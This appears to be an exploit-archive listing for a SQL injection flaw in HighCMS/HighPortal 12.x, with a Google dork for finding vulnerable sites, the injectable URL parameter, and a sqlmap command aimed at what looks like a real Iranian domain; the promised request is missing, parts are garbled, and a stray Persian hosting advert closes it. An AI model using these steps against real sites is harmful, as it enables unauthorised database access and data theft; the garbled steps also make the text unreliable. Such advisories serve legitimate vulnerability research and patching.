HighCMS/HighPortal 12.x SQL Injection
- HighCMS/HighPortal 12.x SQL Injection
- Posted May 16, 2022
- Authored by E1.Coders
- HighCMS/HighPortal version 12.x appears to suffer from a remote SQL injection vulnerability.
- SHA-256 |
11e531f865e4da1f04161aa0a4cb5e11bbe807e029d3818481e6c9fa1d18a1e6 - Download | Favorite | View
# Exploit Title: HighCMS/HighPortal v12.x SQL Inj
# Type : WEBAPPS "HighCMS/HighPortal"
# Platform : ASP.NET
# Date : 4/23/2022
# Exploit Author : E1.Coders
# Software Link : https://aryanic.com/page/portal
# Version : v12.x
# Category : Webapps
# Tested on: Linux/Windows
# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid=# Google Dork: <©2022 HighCMS/HighPortal”
Step 1: Enter the address of the “page” that has the problem of sql injection attacks
http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials. ( is True )
STEP 2 : Send the following request ”
or
Use sqlmap : python sqlmap.py -u “https://example.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211”
سرور شما نیاز به مدیریت و پشتیبانی دارد؟h3>
پیکربندی، مانیتورینگ و نگهداری حرفهای سرورهای لینوکسی و ویندوزی.